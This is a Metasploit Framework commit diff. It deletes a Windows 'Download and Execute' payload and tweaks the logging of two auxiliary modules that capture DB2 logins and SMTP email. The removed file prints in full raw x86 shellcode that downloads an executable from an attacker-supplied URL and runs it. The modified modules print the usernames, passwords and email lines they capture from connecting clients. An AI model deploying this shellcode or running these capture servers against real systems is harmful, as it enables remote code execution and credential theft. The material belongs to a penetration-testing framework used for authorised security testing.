Remove a buggy payload that doesn't have NX support
HD Moore
parent
2da984d700
commit
6cdd044e10
|
|
@ -220,15 +220,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
if @state[c][:user] and @state[c][:pass]
|
if @state[c][:user] and @state[c][:pass]
|
||||||
print_status("DRDA LOGIN Database: #{@state[c][:database]}; #{@state[c][:user]} / #{@state[c][:pass]}")
|
print_status("DRDA LOGIN #{@state[c][:name]} Database: #{@state[c][:database]}; #{@state[c][:user]} / #{@state[c][:pass]}")
|
||||||
report_auth_info(
|
report_auth_info(
|
||||||
:host => @state[c][:ip],
|
:host => @state[c][:ip],
|
||||||
:port => datastore['SRVPORT'],
|
:port => datastore['SRVPORT'],
|
||||||
:sname => 'db2_client',
|
:sname => 'db2_client',
|
||||||
:user => @state[c][:user],
|
:user => @state[c][:user],
|
||||||
:pass => @state[c][:pass],
|
:pass => @state[c][:pass],
|
||||||
:source_type => "captured",
|
:source_type => "captured",
|
||||||
:active => true
|
:active => true
|
||||||
)
|
)
|
||||||
|
|
||||||
params = []
|
params = []
|
||||||
|
|
|
||||||
|
|
@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
data = c.get_once
|
data = c.get_once
|
||||||
return if not data
|
return if not data
|
||||||
|
|
||||||
print_status("SMTP: #{data.strip}")
|
print_status("SMTP: #{@state[c][:name]} Command: #{data.strip}")
|
||||||
|
|
||||||
if(@state[c][:data_mode])
|
if(@state[c][:data_mode])
|
||||||
|
|
||||||
|
|
@ -78,6 +78,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
:type => "smtp_message",
|
:type => "smtp_message",
|
||||||
:data => @state[c][:data_buff][0,idx]
|
:data => @state[c][:data_buff][0,idx]
|
||||||
)
|
)
|
||||||
|
@state[c][:data_buff][0,idx].split("\n").each do |line|
|
||||||
|
print_status("SMTP: #{@state[c][:name]} EMAIL: #{line.strip}")
|
||||||
|
end
|
||||||
|
|
||||||
@state[c][:data_buff] = nil
|
@state[c][:data_buff] = nil
|
||||||
@state[c][:data_mode] = nil
|
@state[c][:data_mode] = nil
|
||||||
c.put "250 OK\r\n"
|
c.put "250 OK\r\n"
|
||||||
|
|
|
||||||
|
|
@ -1,78 +0,0 @@
|
||||||
##
|
|
||||||
# $Id$
|
|
||||||
##
|
|
||||||
|
|
||||||
##
|
|
||||||
# This file is part of the Metasploit Framework and may be subject to
|
|
||||||
# redistribution and commercial restrictions. Please see the Metasploit
|
|
||||||
# web site for more information on licensing and terms of use.
|
|
||||||
# http://metasploit.com/
|
|
||||||
##
|
|
||||||
|
|
||||||
|
|
||||||
require 'msf/core'
|
|
||||||
require 'msf/core/payload/windows/exec'
|
|
||||||
|
|
||||||
|
|
||||||
module Metasploit3
|
|
||||||
|
|
||||||
include Msf::Payload::Windows
|
|
||||||
include Msf::Payload::Single
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'Windows Executable Download and Execute',
|
|
||||||
'Version' => '$Revision$',
|
|
||||||
'Description' => 'Download an EXE from an HTTP URL and execute it',
|
|
||||||
'Author' => [ 'lion[at]cnhonker.com', 'pita[at]mail.com' ],
|
|
||||||
'License' => BSD_LICENSE,
|
|
||||||
'Platform' => 'win',
|
|
||||||
'Arch' => ARCH_X86,
|
|
||||||
'Privileged' => false,
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
'Offsets' => { },
|
|
||||||
'Payload' =>
|
|
||||||
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3C\x01\x80\x34\x0A\x99\xE2\xFA"+
|
|
||||||
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"+
|
|
||||||
"\x70\x4C\x99\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"+
|
|
||||||
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"+
|
|
||||||
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"+
|
|
||||||
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"+
|
|
||||||
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"+
|
|
||||||
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"+
|
|
||||||
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9D\xC0"+
|
|
||||||
"\x71\xC9\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"+
|
|
||||||
"\xF3\x98\xC0\x71\xA4\x99\x99\x99\x1A\x5F\x8A\xCF\xDF\x19\xA7\x19"+
|
|
||||||
"\xEC\x63\x19\xAF\x19\xC7\x1A\x75\xB9\x12\x45\xF3\xB9\xCA\x66\xCE"+
|
|
||||||
"\x75\x5E\x9D\x9A\xC5\xF8\xB7\xFC\x5E\xDD\x9A\x9D\xE1\xFC\x99\x99"+
|
|
||||||
"\xAA\x59\xC9\xC9\xCA\xCF\xC9\x66\xCE\x65\x12\x45\xC9\xCA\x66\xCE"+
|
|
||||||
"\x69\xC9\x66\xCE\x6D\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA"+
|
|
||||||
"\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A\x71\xBF\x66\x66\x66\xDE"+
|
|
||||||
"\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDE\xFC"+
|
|
||||||
"\xED\xCA\xE0\xEA\xED\xFC\xF4\xDD\xF0\xEB\xFC\xFA\xED\xF6\xEB\xE0"+
|
|
||||||
"\xD8\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99\xDC\xE1\xF0\xED\xCD\xF1"+
|
|
||||||
"\xEB\xFC\xF8\xFD\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0"+
|
|
||||||
"\xD8\x99\xEC\xEB\xF5\xF4\xF6\xF7\x99\xCC\xCB\xD5\xDD\xF6\xEE\xF7"+
|
|
||||||
"\xF5\xF6\xF8\xFD\xCD\xF6\xDF\xF0\xF5\xFC\xD8\x99"
|
|
||||||
}
|
|
||||||
))
|
|
||||||
|
|
||||||
# EXITFUNC is not supported :/
|
|
||||||
deregister_options('EXITFUNC')
|
|
||||||
|
|
||||||
# Register command execution options
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
OptString.new('URL', [ true, "The pre-encoded URL to the executable" ])
|
|
||||||
], self.class)
|
|
||||||
end
|
|
||||||
|
|
||||||
#
|
|
||||||
# Constructs the payload
|
|
||||||
#
|
|
||||||
def generate_stage
|
|
||||||
return module_info['Payload']['Payload'] + (datastore['URL'] || '') + "\x80"
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
||||||
Loading…
Reference in New Issue